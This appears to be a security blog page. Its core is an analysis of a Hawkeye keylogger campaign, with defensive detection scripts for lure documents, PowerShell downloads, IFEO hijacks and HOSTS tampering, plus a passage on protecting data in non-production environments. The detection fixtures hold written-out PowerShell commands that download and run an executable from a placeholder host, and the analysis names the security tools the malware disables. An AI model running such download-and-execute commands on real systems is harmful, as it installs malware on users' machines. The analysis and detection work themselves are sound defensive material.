Figure 3. Microsoft Cyber Defense Operations Center.

Digging deeper

In part 2 of our series, we'll showcase Microsoft services that enable customers to protect assets and workloads extending beyond the Microsoft ecosystem. Meanwhile, learn more about the depth and breadth of Microsoft 365 Security and start trials of our advanced solutions, which include:


Hawkeye Keylogger – Reborn v8: An in-depth campaign analysis

Much of cybercrime today is fueled by underground markets where malware and cybercriminal services are available for purchase. These markets in the deep web commoditize malware operations. Even novice cybercriminals can buy malware toolkits and other services they might need for malware campaigns: encryption, hosting, antimalware evasion, spamming, and many others.

Hawkeye Keylogger (also known as iSpy Keylogger) is an info-stealing malware that's being sold as malware-as-a-service. Over the years, the malware authors behind Hawkeye have improved the malware service, adding new capabilities and techniques. It was last used in a high-volume campaign in 2016.

This year marked the resurgence of Hawkeye. In April, malware authors started peddling a new version of the malware that they called Hawkeye Keylogger – Reborn v8. Not long after, on April 30, Office 365 Advanced Threat Protection (Office 365 ATP) detected a high-volume campaign that distributed the latest variants of this keylogger.

At the onset, Office 365 ATP blocked the email campaign and protected customers, 52% of whom are in the software and tech sector. Companies in the banking (11%), energy (8%), chemical (5%), and automotive (5%) industries are also among the top targets.

Figure 1. Top industries targeted by the April 2018 Hawkeye campaign

Office 365 ATP uses intelligent systems that inspect attachments and links for malicious content to protect customers against threats like Hawkeye in real time. These automated systems include a robust detonation platform, heuristics, and machine learning models. Office 365 ATP uses intelligence from various sensors, including multiple capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP).

Windows Defender AV (a component of Windows Defender ATP) detected and blocked the malicious attachments used in the campaign in at least 40 countries. United Arab Emirates accounted for 19% of these file encounters, while the Netherlands (15%), the US (11%), South Africa (6%) and the UK (5%) make the rest of the top 5 countries that saw the lure documents used in the campaign. A combination of generic and heuristic protections in Windows Defender AV (TrojanDownloader:O97M/Donoff, Trojan:Win32/Tiggre!rfn, Trojan:Win32/Bluteal!rfn, VirTool:MSIL/NetInject.A) ensured these threats are blocked in customer environments.

Figure 2. Top countries that encountered malicious documents used in the Hawkeye campaign

As part of our job to protect customers from malware attacks, Office 365 ATP researchers monitor malware campaigns like Hawkeye and other developments in the cybercriminal landscape. Our in-depth investigation into malware campaigns like Hawkeye and many others adds to the vast threat intelligence we get from the Microsoft Intelligent Security Graph, which enables us to continuously raise the bar in security. Through the Intelligent Security Graph, security technologies in Microsoft 365 share signals and detections, allowing these technologies to automatically update protection and detection mechanisms, as well as orchestrate remediation across Microsoft 365.

Figure 3. Microsoft 365 threat protection against Hawkeye

Campaign overview

Despite its name, Hawkeye Keylogger – Reborn v8 is more than a common keylogger. Over time, its authors have integrated various modules that provide advanced functionalities like stealth and detection evasion, as well as credential theft and more.

Malware services like Hawkeye are advertised and sold in the deep web, which requires anonymity networks like Tor to access. Interestingly, the Hawkeye authors advertised their malware and even published tutorial videos on a website on the surface web (that has since been taken down). Even more interesting, based on underground forums, it appears the malware authors have employed intermediary resellers, an example of how cybercriminal underground business models expand and evolve.

Our investigation into the April 2018 Hawkeye campaign shows that the cybercriminals have been preparing for the operation since February, when they registered the domains they later used in the campaign.

Typical of malware campaigns, the cybercriminals undertook the following steps:

  • Built malware samples and malware configuration files using a malware builder they acquired from the underground
  • Built weaponized documents to be used as a social engineering lure (possibly by using another tool bought in the underground)
  • Packed or obfuscated the samples (using a customized open-source packer)
  • Registered domains for delivery of malware
  • Launched a spam campaign (possibly using a paid spam service) to distribute the malware

Like other malware toolkits, Hawkeye comes with an admin panel that cybercriminals use to monitor and control the attack.

Figure 4: Hawkeye's admin panel

Interestingly, some of the methods used in this Hawkeye campaign are consistent with previous attacks. This suggests that the cybercriminals behind this campaign may be the same group responsible for malware operations that delivered the remote access tool (RAT) Remcos and the info-stealing bot malware Loki. The following methods were used in these campaigns:

  • Multiple documents that create a complicated, multi-stage delivery chain
  • Redirections using shortened bit.ly links
  • Use of malicious macro, VBScript, and PowerShell scripts to run the malware; the Remcos campaign employed an exploit for CVE-2017-0199 but used the same domains
  • Consistent obfuscation technique across multiple samples

Point of entry

In late April, Office 365 ATP analysts spotted a new spam campaign with the subject line "RFQ-GHFD456 ADCO 5647 deadline 7th May" carrying a Word document attachment named Scan Copy 001.doc. While the attachment's file name extension was .doc, it was in fact a malicious Office Open XML format document, which usually uses a .docx file name extension.

In total, the campaign used four different subject lines and five attachments.

Figure 5: Sample emails used in the Hawkeye campaign

Because the attachment contains malicious code, Microsoft Word opens with a security warning. The document uses a common social engineering lure: it displays a fake message and an instruction to Enable editing and Enable content.

Figure 6: The malicious document with social engineering lure

The document contains an embedded frame that connects to a remote location using a shortened URL.

Figure 7: Frame in settings.rels.xml in the document

The frame loads an .rtf file from hxxp://bit[.]ly/Loadingwaitplez, which redirects to hxxp://stevemike-fireforce[.]info/work/doc/10.doc.
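The external frame relationship is the first thing a triage analyst looks for in a lure document like this one. The following script is an added example, not code from the post or from Microsoft: it opens an Office Open XML package as a zip, lists every relationship with TargetMode="External", and flags those that make Word fetch content over http(s) on open (frames, attached templates, OLE objects), leaving out ordinary hyperlinks. The sample package is constructed in memory with a placeholder host (example.invalid); nothing is fetched from the network.

```python
"""Triage check for Office Open XML lure documents: list every relationship
that points outside the package (TargetMode="External") and flag the ones
that load content over http(s) when the document opens, such as the frame
relationship in word/_rels/settings.xml.rels that the Hawkeye lure used to
pull a remote RTF. The sample document below is constructed in memory."""
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OOXML_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def external_relationships(docx_bytes):
    """Return (rels_part, short_type, target) for each external relationship
    found in any .rels part of the package."""
    found = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                short_type = rel.get("Type", "").rsplit("/", 1)[-1]
                found.append((name, short_type, rel.get("Target", "")))
    return found


def remote_content_loads(docx_bytes):
    """Keep only external targets that Word fetches automatically over http(s)
    (frame, attachedTemplate, oleObject, image ...). Plain hyperlinks need a
    user click and are left out of the result."""
    hits = []
    for part, short_type, target in external_relationships(docx_bytes):
        parsed = urlparse(target)
        if parsed.scheme.lower() in ("http", "https") and short_type != "hyperlink":
            hits.append({"part": part, "type": short_type,
                         "target": target, "host": parsed.hostname})
    return hits


def build_sample_docx():
    """Constructed minimal package: one frame relationship to a remote document
    on the placeholder host example.invalid, plus one ordinary hyperlink."""
    settings_rels = (
        f'<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}frame" '
        f'Target="http://example.invalid/work/doc/10.doc" TargetMode="External"/>'
        f'</Relationships>'
    )
    document_rels = (
        f'<?xml version="1.0" encoding="UTF-8"?>'
        f'<Relationships xmlns="{REL_NS}">'
        f'<Relationship Id="rId1" Type="{OOXML_REL}hyperlink" '
        f'Target="https://example.invalid/contact" TargetMode="External"/>'
        f'<Relationship Id="rId2" Type="{OOXML_REL}settings" Target="settings.xml"/>'
        f'</Relationships>'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<?xml version="1.0"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
        zf.writestr("word/_rels/document.xml.rels", document_rels)
    return buf.getvalue()


if __name__ == "__main__":
    for hit in remote_content_loads(build_sample_docx()):
        print("%(part)s: %(type)s -> %(target)s" % hit)
```

Run it against a real sample by passing the file's bytes to remote_content_loads(); the part name tells you which component (settings, document, header) carries the remote load, which is usually enough to decide whether the document warrants detonation.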

Figure 8: RTF loaded as a frame inside malicious document

The RTF has an embedded malicious .xlsx file with a macro as an OLE object, which in turn contains a stream named PACKAGE that contains the .xlsx contents.

The macro script is mostly obfuscated, but the URL to the malware payload is notably in plaintext.

Figure 9: Obfuscated macro entry point

De-obfuscating the entire script makes its intention clear. The first section uses PowerShell and the System.Net.WebClient object to download the malware to the path C:\Users\Public\svchost32.exe and execute it.

The macro script then terminates both winword.exe and excel.exe. In specific scenarios where Microsoft Word overrides default settings and is running with administrator privileges, the macro can delete Windows Defender AV's malware definitions. It then changes the registry to disable Microsoft Office's security warnings and safety features.
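The download step is also the most detectable one: an Office application spawning PowerShell that fetches a file with System.Net.WebClient into C:\Users\Public and runs it. The scoring logic below is an added example written for this post, not Microsoft's detection code; it runs over constructed process-creation events in a generic EDR/Sysmon-style shape (pid, parent_image, image, command_line), with placeholder hosts on example.invalid. It also scores the same command line from a non-Office parent so the rule does not depend on the Office parent alone.

```python
"""Detection logic for the delivery step: an Office process spawning
PowerShell that downloads a payload with System.Net.WebClient into
C:\\Users\\Public and launches it. Events are constructed, not real telemetry."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Each indicator adds one point; being spawned by an Office app adds two.
INDICATORS = {
    "webclient_download": re.compile(
        r"(?:System\.)?Net\.WebClient.*?\bDownload(?:File|String|Data)\b", re.I | re.S),
    "drop_in_users_public": re.compile(r"C:\\Users\\Public\\[^\s'\"]+\.exe", re.I),
    "hidden_or_bypass_switch": re.compile(
        r"-(?:w(?:indowstyle)?\s+hidden|e(?:xecutionpolicy|p)\s+bypass|nop(?:rofile)?)\b", re.I),
    "launches_dropped_file": re.compile(r"Start-Process|Invoke-Item|\.Start\(\)|\bsaps\b", re.I),
}
THRESHOLD = 3


def score_event(evt):
    """Return (score, reasons) for one process-creation event."""
    if evt["image"].lower() not in POWERSHELL:
        return 0, []
    score, reasons = 0, []
    if evt["parent_image"].lower() in OFFICE_PARENTS:
        score += 2
        reasons.append("spawned_by_office:" + evt["parent_image"].lower())
    for name, pattern in INDICATORS.items():
        if pattern.search(evt["command_line"]):
            score += 1
            reasons.append(name)
    return score, reasons


def find_suspicious(events, threshold=THRESHOLD):
    """Events whose score reaches the threshold, with the reasons that fired."""
    out = []
    for evt in events:
        score, reasons = score_event(evt)
        if score >= threshold:
            out.append({"pid": evt["pid"], "score": score, "reasons": reasons})
    return out


# Constructed sample events (not real telemetry); hosts use example.invalid.
SAMPLE_EVENTS = [
    {"pid": 4120, "parent_image": "WINWORD.EXE", "image": "powershell.exe",
     "command_line": "powershell.exe -NoProfile -WindowStyle Hidden -Command "
                     "\"$w = New-Object System.Net.WebClient; "
                     "$w.DownloadFile('http://example.invalid/10.exe','C:\\Users\\Public\\svchost32.exe'); "
                     "Start-Process 'C:\\Users\\Public\\svchost32.exe'\""},
    # Benign: directory listing from the shell.
    {"pid": 4188, "parent_image": "explorer.exe", "image": "powershell.exe",
     "command_line": "powershell.exe Get-ChildItem C:\\Users\\Public"},
    # Benign: -NoProfile alone is common in scheduled admin scripts.
    {"pid": 4201, "parent_image": "services.exe", "image": "powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq 'Running'\""},
    # Same download pattern from cmd.exe: still scores 3 without the Office parent.
    {"pid": 4377, "parent_image": "cmd.exe", "image": "powershell.exe",
     "command_line": "powershell -w hidden -ep bypass -c "
                     "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/a.bin','C:\\Users\\Public\\update.exe')\""},
    # Not PowerShell at all: print spooler helper spawned by Word.
    {"pid": 4402, "parent_image": "WINWORD.EXE", "image": "splwow64.exe",
     "command_line": "splwow64.exe 12288"},
]

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(hit)
```

The threshold is deliberately reached by the command line alone when it downloads to C:\Users\Public with a hidden window, so the rule still fires if the attacker changes the launching application; the Office parent raises the score rather than gating the rule.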

In summary, the campaign's delivery comprises multiple layers of components that aim to evade detection and possibly complicate analysis by researchers.

Figure 10: The campaign's delivery stages

The downloaded payload, svchost32.exe, is a .NET assembly named Millionare that is obfuscated using a custom version of ConfuserEx, a well-known open-source .NET obfuscator.

Figure 11: Obfuscated .NET assembly Millionare showing some of the scrambled names

The obfuscation modifies the .NET assembly's metadata such that all the class and variable names are non-meaningful, scrambled Unicode names. This obfuscation causes some analysis tools like .NET Reflector to show some namespace or class names as blank, or in some cases, display parts of the code backwards.

Figure 12: .NET Reflector presenting the code backwards due to obfuscation

Finally, the .NET binary loads an unpacked .NET assembly, which includes DLL files embedded as resources in the portable executable (PE).

Figure 13: Loading the unpacked .NET assembly during run-time

Malware loader

The DLL that initiates the malicious behavior is embedded as a resource in the unpacked .NET assembly. It is loaded in memory using process hollowing, a code injection technique that involves spawning a new instance of a legitimate process and then hollowing it out, i.e., replacing the legitimate code with malware.

Figure 14: In-memory unpacking of the malware using process hollowing.

Unlike previous Hawkeye variants (v7), which loaded the main payload into its own process, the new Hawkeye malware injects its code into MSBuild.exe, RegAsm.exe, and VBC.exe, which are signed executables that ship with the .NET Framework. This is an attempt to masquerade as a legitimate process.

Figure 15: Obfuscated calls using .NET reflection to perform the process hollowing injection routine that injects the malware's main payload into RegAsm.exe

Additionally, in the previous version, the process hollowing routine was written in C. In the new version, this routine is completely rewritten in managed .NET code that calls the native Windows API.

Figure 16: Process hollowing routine implemented in .NET using native API function calls

Malware functionalities

The new Hawkeye variants created by the latest version of the malware toolkit have multiple sophisticated functions for information theft and evading detection and analysis.

Information theft

The main keylogger functionality is implemented using hooks that monitor key presses, as well as mouse clicks and window context, along with clipboard hooks and screenshot capability.

It has specific modules for extracting and stealing credentials from the following applications:

  • Beyluxe Messenger
  • Core FTP
  • FileZilla
  • Minecraft (replaced the RuneScape module in the previous version)

Like many other malware campaigns, it uses the legitimate BrowserPassView and MailPassView tools to dump credentials from the browser and email client. It also has modules for taking screenshots of the desktop, as well as the webcam, if it exists.

Notably, the malware has a mechanism to visit certain URLs for click-based monetization.

Stealth and anti-analysis

On top of the process hollowing technique, this malware uses other methods for stealth, including deleting the alternate data stream that carries the mark of the web (MOTW) from the malware's downloaded files.

This malware can be configured to delay execution by any number of seconds, a technique used mainly to avoid detection by various sandboxes.

It prevents antivirus software from running using an interesting technique. It adds keys to the registry location HKLM\Software\Windows NT\Current Version\Image File Execution Options and sets the Debugger value for certain processes to rundll32.exe, which prevents those processes from executing. It targets the following processes related to antivirus and other security software:

  • AvastSvc.exe
  • AvastUI.exe
  • avcenter.exe
  • avconfig.exe
  • avgcsrvx.exe
  • avgidsagent.exe
  • avgnt.exe
  • avgrsx.exe
  • avguard.exe
  • avgui.exe
  • avgwdsvc.exe
  • avp.exe
  • avscan.exe
  • bdagent.exe
  • ccuac.exe
  • ComboFix.exe
  • egui.exe
  • hijackthis.exe
  • instup.exe
  • keyscrambler.exe
  • mbam.exe
  • mbamgui.exe
  • mbampt.exe
  • mbamscheduler.exe
  • mbamservice.exe
  • MpCmdRun.exe
  • MSASCui.exe
  • MsMpEng.exe
  • msseces.exe
  • rstrui.exe
  • spybotsd.exe
  • wireshark.exe
  • zlclient.exe
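A defender can audit for this technique offline from a .reg export of the Image File Execution Options key. The parser below is an added example, not part of the post or of any Microsoft tool: it reads the exported text, collects every Debugger value, and reports entries whose "debugger" is not a real debugger (rundll32.exe means the named program simply never starts). The sample export is constructed and uses the standard IFEO location under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion; the trusted-debugger allowlist is an assumption you should adjust to your environment.

```python
"""Offline check for the IFEO Debugger trick: parse a .reg export of
Image File Execution Options and report images whose Debugger value is not
a known debugger. The sample export is constructed."""
import ntpath
import re

IFEO_MARKER = "\\image file execution options\\"
# Debuggers an administrator might legitimately register (assumed allowlist).
TRUSTED_DEBUGGERS = {"vsjitdebugger.exe", "windbg.exe", "cdb.exe", "gflags.exe"}
# Subset of the processes the post lists as Hawkeye's targets.
SECURITY_TOOLS = {"msmpeng.exe", "mpcmdrun.exe", "msascui.exe", "mbam.exe",
                  "avp.exe", "egui.exe", "wireshark.exe", "hijackthis.exe"}

_KEY_RE = re.compile(r"^\[(.+)\]$")
_STR_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape_reg(s):
    """Undo .reg string escaping: a backslash escapes the next character."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def parse_ifeo_debuggers(reg_text):
    """Map image name -> Debugger string for every IFEO subkey in the export."""
    debuggers, current_image = {}, None
    for raw in reg_text.splitlines():
        line = raw.strip()
        m = _KEY_RE.match(line)
        if m:
            key = m.group(1)
            idx = key.lower().find(IFEO_MARKER)
            current_image = key[idx + len(IFEO_MARKER):] if idx >= 0 else None
            continue
        if current_image is None:
            continue
        m = _STR_VALUE_RE.match(line)
        if m and _unescape_reg(m.group(1)).lower() == "debugger":
            debuggers[current_image] = _unescape_reg(m.group(2))
    return debuggers


def _debugger_basename(debugger):
    """First token of the Debugger string, with quotes and path removed."""
    debugger = debugger.strip()
    if debugger.startswith('"'):
        end = debugger.find('"', 1)
        exe = debugger[1:end] if end > 0 else debugger[1:]
    else:
        exe = debugger.split()[0] if debugger else ""
    return ntpath.basename(exe).lower()


def find_ifeo_hijacks(reg_text):
    """IFEO entries whose Debugger is not in the allowlist. A non-debugger such
    as rundll32.exe is run instead of the image, so the image never starts."""
    hits = []
    for image, debugger in parse_ifeo_debuggers(reg_text).items():
        if _debugger_basename(debugger) in TRUSTED_DEBUGGERS:
            continue
        hits.append({"image": image, "debugger": debugger,
                     "security_tool": image.lower() in SECURITY_TOOLS})
    return hits


IFEO = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options"
# Constructed export: two hijacks of security tools, one legitimate
# just-in-time debugger on notepad.exe, one subkey without a Debugger value.
SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[{IFEO}\\MsMpEng.exe]
"Debugger"="rundll32.exe"

[{IFEO}\\wireshark.exe]
"Debugger"="svchost.exe"

[{IFEO}\\notepad.exe]
"Debugger"="\\"C:\\\\Program Files\\\\Debugger\\\\vsjitdebugger.exe\\" -p %ld -e %ld"

[{IFEO}\\chrome.exe]
"DisableExceptionChainValidation"=dword:00000000
"""

if __name__ == "__main__":
    for hit in find_ifeo_hijacks(SAMPLE_REG):
        print(hit)
```

On a live system the same check runs against `reg export "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" ifeo.reg`; anything reported for a name on the list above, or for a debugger that is not one you installed, is worth an incident ticket rather than a silent cleanup, because the value is the symptom, not the infection.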

Further, it blocks access to certain domains that are usually associated with antivirus or security updates. It does this by modifying the HOSTS file. The list of domains to be blocked is determined by the attacker using a config file.
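HOSTS-file tampering is just as easy to audit, and the file can be copied off the host and checked anywhere. The script below is an added example, not from the post or from Microsoft: it parses the hosts file (comments, several names per line, IPv4 and IPv6), reports every non-local name pinned to a loopback or unspecified address, and marks names that look like security or update endpoints. The sample content, the vendor names and the keyword watchlist are constructed; real vendor update hostnames belong in the watchlist for your environment.

```python
"""Check for HOSTS-file tampering: vendor or update hostnames mapped to a
blackhole address so security products can no longer update. Pure parsing,
so it works on a copy of %SystemRoot%\\System32\\drivers\\etc\\hosts from any
platform. Sample content is constructed."""
import ipaddress

# Names that legitimately resolve to loopback.
LOCAL_NAMES = {"localhost", "localhost.localdomain", "ip6-localhost",
               "ip6-loopback", "broadcasthost"}
# Fragments that suggest a security or update service (constructed watchlist).
WATCH_FRAGMENTS = ("update", "definitions", "av-", "antivirus",
                   "defender", "telemetry")


def parse_hosts(text):
    """Return (address, hostname, line_no) for every mapping, ignoring comments
    and lines that do not start with a valid address."""
    entries = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        try:
            addr = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # malformed or not a mapping line
        for host in parts[1:]:
            entries.append((addr, host.lower(), line_no))
    return entries


def is_blackhole(addr):
    """Loopback (127.0.0.0/8, ::1) or unspecified (0.0.0.0, ::) addresses
    send the traffic nowhere useful."""
    return addr.is_loopback or addr.is_unspecified


def find_blackholed_hosts(text):
    """Non-local names mapped to a blackhole address, flagged when the name
    looks like a security or update endpoint."""
    hits = []
    for addr, host, line_no in parse_hosts(text):
        if host in LOCAL_NAMES or not is_blackhole(addr):
            continue
        hits.append({"line": line_no, "address": str(addr), "host": host,
                     "security_related": any(f in host for f in WATCH_FRAGMENTS)})
    return hits


SAMPLE_HOSTS = """# Constructed sample; vendor names are placeholders.
127.0.0.1       localhost
::1             localhost
0.0.0.0   av-updates.vendor-a.invalid            # blocked definition updates
127.0.0.1 liveupdate.vendor-b.invalid telemetry.vendor-b.invalid
192.0.2.10 intranet.corp.invalid                # ordinary static mapping
127.0.0.1 dev.myapp.invalid                     # developer override, not security-related
bad-line-without-address
"""

if __name__ == "__main__":
    for hit in find_blackholed_hosts(SAMPLE_HOSTS):
        print(hit)
```

Entries that are blackholed but not security-related (the developer override in the sample) are still returned, because an analyst should see every redirection and decide; the security_related flag only orders the review.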

This malware protects its own processes. It blocks the command prompt, registry editor, and task manager. It does this by modifying registry keys for local group policy administrative templates. It also constantly checks active windows and renders action buttons unusable if the window title matches ProcessHacker, Process Explorer, or Taskmgr.

Meanwhile, it prevents other malware from infecting the machine. It repeatedly scans and removes any new values to certain registry keys, stops associated processes, and deletes related files.

Hawkeye attempts to avoid automated analysis. The delay in execution is designed to defeat automated sandbox analysis that allots only a certain time for malware execution and analysis. It likewise attempts to evade manual analysis by monitoring windows and exiting when it finds the following analysis tools:

  • Sandboxie
  • Winsock Packet Editor Pro
  • Wireshark

Defending mailboxes, endpoints, and networks against persistent malware campaigns

Hawkeye illustrates the continuous evolution of malware in a threat landscape fueled by the cybercriminal underground. Malware services make malware accessible to even unsophisticated operators, while simultaneously making malware more durable with advanced techniques like in-memory unpacking and abuse of .NET's CLR engine for stealth. In this blog we covered the capabilities of its latest version, Hawkeye Keylogger – Reborn v8, highlighting some of the enhancements from the previous version. Given its history, Hawkeye is likely to release a new version in the future.

Organizations should continue educating their employees about spotting and preventing social engineering attacks. After all, Hawkeye's complicated infection chain begins with a social engineering email and lure document. A security-aware workforce will go a long way in securing networks against attacks.

More importantly, securing mailboxes, endpoints, and networks using advanced threat protection technologies can prevent attacks like Hawkeye, other malware operations, and sophisticated cyberattacks.

Our in-depth analysis of the latest version and our insight into the cybercriminal operation that drives this development allow us to proactively build robust protections against both known and unknown threats.

Office 365 Advanced Threat Protection (Office 365 ATP) protects mailboxes as well as files, online storage, and applications from malware campaigns like Hawkeye. It uses a robust detonation platform, heuristics, and machine learning to inspect attachments and links for malicious content in real-time, ensuring that emails that carry Hawkeye and other threats don't reach mailboxes and devices. Learn how to add Office 365 ATP to existing Exchange or Office 365 plans.

Windows Defender Antivirus (Windows Defender AV) provides an additional layer of protection by detecting malware delivered through email, as well as other infection vectors. Using local and cloud-based machine learning, Windows Defender AV's next-gen protection can block even new and unknown threats on Windows 10 and Windows 10 in S mode.

Additionally, endpoint detection and response (EDR) capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP) expose sophisticated and evasive malicious behavior, such as the techniques used by Hawkeye. Sign up for a free Windows Defender ATP trial.

Windows Defender ATP's rich detection libraries are powered by machine learning and allow security operations teams to detect and respond to anomalous attacks in the network. For example, machine learning detection algorithms surface the following alert when Hawkeye uses malicious PowerShell to download the payload:

Figure 16: Windows Defender ATP alert for Hawkeye's malicious PowerShell component

Windows Defender ATP also has behavior-based machine learning algorithms that detect the payload itself:

Figure 17: Windows Defender ATP alert for Hawkeye's payload

These security technologies are part of the advanced threat protection solutions in Microsoft 365. Enhanced signal sharing across services in Windows, Office 365, and Enterprise Mobility + Security through the Microsoft Intelligent Security Graph enables the automatic update of protections and orchestration of remediation across Microsoft 365.

Office 365 ATP Research

Indicators of Compromise (IoCs)

Email subject lines

  • {EXT} NEW ORDER ENQUIRY #65563879884210#
  • B/L COPY FOR SHIPMENT
  • Betreff: URGENT ENQ FOR Equipment
  • RFQ-GHFD456 ADCO 5647 deadline 7th May

Attachment file names

  • Betreff URGENT ENQ FOR Equipment.doc
  • BILL OF LADING.doc
  • NEW ORDER ENQUIRY #65563879884210#.doc
  • Scan Copy 001.doc
  • Swift Copy.doc

Domains

  • lokipanelhostingpanel[.]gq
  • stellarball[.]com
  • stemtopx[.]com
  • stevemike-fireforce[.]info

Shortened redirector links

  • hxxp://bit[.]ly/ASD8239ASdmkWi38AS (was also used in a Remcos campaign)
  • hxxp://bit[.]ly/loadingpleaswaitrr
  • hxxp://bit[.]ly/Loadingwaitplez

Files (SHA-256)

  • d97f1248061353b15d460eb1a4740d0d61d3f2fcb41aa86ca6b1d0ff6990210a – .eml
  • 23475b23275e1722f545c4403e4aeddf528426fd242e1e5e17726adb67a494e6 – .eml
  • 02070ca81e0415a8df4b468a6f96298460e8b1ab157a8560dcc120b984ba723b – .eml
  • 79712cc97a19ae7e7e2a4b259e1a098a8dd4bb066d409631fb453b5203c1e9fe – .eml
  • 452cc04c8fc7197d50b2333ecc6111b07827051be75eb4380d9f1811fa94cbc2 – .eml
  • 95511672dce0bd95e882d7c851447f16a3488fd19c380c82a30927bac875672a – .eml
  • 1b778e81ee303688c32117c6663494616cec4db13d0dee7694031d77f0487f39 – .eml
  • 12e9b955d76fd0e769335da2487db2e273e9af55203af5421fc6220f3b1f695e – .eml
  • 12f138e5e511f9c75e14b76e0ee1f3c748e842dfb200ac1bfa43d81058a25a28 – .eml
  • 9dfbd57361c36d5e4bda9d442371fbaa6c32ae0e746ebaf59d4ec34d0c429221 – .docx (stage 1)
  • f1b58fd2bc8695effcabe8df9389eaa8c1f51cf4ec38737e4fbc777874b6e752 – .rtf (stage 2)
  • 5ad6cf87dd42622115f33b53523d0a659308abbbe3b48c7400cc51fd081bf4dd – .doc
  • 7db8d0ff64709d864102c7d29a3803a1099851642374a473e492a3bc2f2a7bae – .rtf
  • 01538c304e4ed77239fc4e31fb14c47604a768a7f9a2a0e7368693255b408420 – .rtf
  • d7ea3b7497f00eec39f8950a7f7cf7c340cf9bf0f8c404e9e677e7bf31ffe7be – .vbs
  • ccce59e6335c8cc6adf973406af1edb7dea5d8ded4a956984dff4ae587bcf0a8 – .exe (packed)
  • c73c58933a027725d42a38e92ad9fd3c9bbb1f8a23b3f97a0dd91e49c38a2a43 – .exe (unpacked)


P = NP: Cloud data protection in vulnerable non-production environments

July 11th, 2018 No comments

Data is the holy grail of your cloud workloads for attackers. Data breaches are the kind of breaches that make the news. With the recent European Union General Data Protection Regulations (GDPR), they will make even bigger headlines. From an enterprise point of view, the most challenging aspect of protecting data is knowing what it is and where it resides. Only when these two questions are answered can you drive data protection via organizational policies.

Most of your sensitive data is collected in production environments, the environments you know you need to protect, and usually do. But this is only part of the story. Even though best practices mandate that sensitive information be scrubbed before it moves around the organization, this cannot be guaranteed. It stands in contradiction to the growing adoption and improvement of the shift-left testing concept, as well as other business needs.

Shift-left testing is the movement of testing to earlier stages in the development lifecycle. Mature testing in early stages is appreciated as it helps developers find problems earlier and in a more cost-effective manner. It also helps quality assurance teams to reproduce bugs in the system and accelerates the debugging processes.

There are other business needs for pulling data to non-production environments. In the research and analytics space, data scientists and analysts prefer to use real data to do their research effectively, whether to offer models that improve the production systems, to perform forensic and log analysis, or to bring insight to product, strategy, and marketing teams, to name a few. In the customer service space, helpdesk personnel may need to pull sensitive records to allow them to perform their jobs efficiently.

For these purposes and others, production data is being pulled not only to the staging environment, but also to development and test environments, as well as research and analytics environments. Data may even reach personal or team playgrounds. Oftentimes, the reality is that organizations disperse data across various environments, making it hard to keep track of what and where.

The following schematic depicts the flow of code from development environments to staging and production environments, along with the flow of production data back to staging, development, and research environments to allow for mature testing and business improvement at earlier stages. The latter flow may even continue to leak outside the organization's IT.

From a security point of view, the data pull should be protected, and sensitive data should not be present in a non-production environment. Synthetic fake data generation should be applied when possible, and format-preserving masking should be applied when data needs to be more realistic. However, not using real data will always impose some loss of data properties and, in turn, the data will always lack some characteristics that may be crucial for testing, and certainly for research. Therefore, to enable advanced testing at earlier stages and allow for better analytics, real data will keep being pulled out of production environments, and the associated risk will be spread throughout the organizations data stores.

To address this risk, applying perimeter solutions is a good start. But if this is your answer to the risk, then you should think again! Are you sure that once an attacker gets a hold of your sensitive data, he cannot evade detection? Are you sure that you have no malicious insiders? What is a perimeter in the cloud?

Let's take a step back and rethink the basics of what is needed from a data protection solution: beyond basic security requirements, such as role-based access control, multifactor authentication, setting up firewalls, and encrypting data at rest and data in transit, advanced threat protection should be deployed. This comprises:

  1. Visibility on where your sensitive data resides, what type of sensitive data it is, and who is accessing this data and how.
  2. Understanding the vulnerabilities of your data stores and being able to fix them.
  3. Detecting the threats and attempts made to infiltrate your data stores.

Any subset of these capabilities is going to leave weak spots in your organization's posture. For instance, if you have visibility regarding the whereabouts of sensitive data, but no knowledge of the vulnerabilities of your databases, can you be sure that any attempt to infiltrate/exfiltrate your database is detected? Test environments are commonly targeted for data breaches where real data is used for testing and development purposes, like the recent example of Shutterfly.

In addition, if you have a vulnerability in a non-production resource, most likely it exists in similar production resources as well. Finding this out gives attackers a great deal of leverage in reconnaissance terms. They can probe and investigate non-production environments to find weak spots, then apply them to production environments, minimizing their contact with your production environments and minimizing the probability of being caught by your threat detection solutions, in case the latter are only deployed on your production environments.

